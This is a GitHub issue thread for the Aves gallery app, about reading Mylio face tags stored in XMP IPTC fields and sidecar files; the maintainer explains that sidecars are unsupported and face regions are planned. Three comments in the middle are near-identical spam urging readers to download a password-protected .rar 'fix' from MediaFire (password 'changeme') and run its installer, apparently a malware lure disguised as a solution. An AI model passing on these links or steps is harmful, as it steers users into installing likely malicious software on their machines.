### ISSUE TITLE
Aves isn't finding my face tags (XMP metadata)


### ISSUE THREAD

**Issue by amal-rgb** [deckerst/aves#1153]
Hi,
I use mylio for automatic face recognition/tagging and smart tags. Mylio saves them in an XMP sidecar. 

Since I couldn't get aves to read the sidecars I decided to merge the sidecar into the jpg metadata using  exiftool. But aves isn't finding them. 

The tags are under XMP : IPTC Extension
 Person In Image [1]⁩ <name>

In XMP there are regions assigned by mylio for each face (multiple regions for multiple people)

When a new random tag is made in aves the xmp showed it is saved under Dublin core
 Subject [1]⁩ <tag>

So my question is this. 
Is there a way for aves to read the side car files?  Can aves only Read the Dublin core field for tags? Is there a way for me to transfer the IPTC field data to Dublin core. 

Side note:
 I'm not a huge fan of the mylio mobile app(the ui). I really like the aves ui ( its clean and super smooth ) and the app has some sick features. 
I have a lot of old family photos and  too busy to manually tag all of it. I don't always have my laptop with me.  So I'm using mylio to smartly sort the photos and aves to view and browse through it locally on my phone.

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deckerst** [comment]
Regarding sidecar files, no Aves can't see them (they are not media files) and even if it could I wouldn't support them as I think it's not as convenient as having the metadata within the media files. 

Regarding tags, I wouldn't mix generic tags (the Dublin core "subjects") with the face regions, as they are semantically distinct. However, I would like to support XMP regions in general and display faces/people in their own category (like tags and countries). It is already requested here: 
- #69
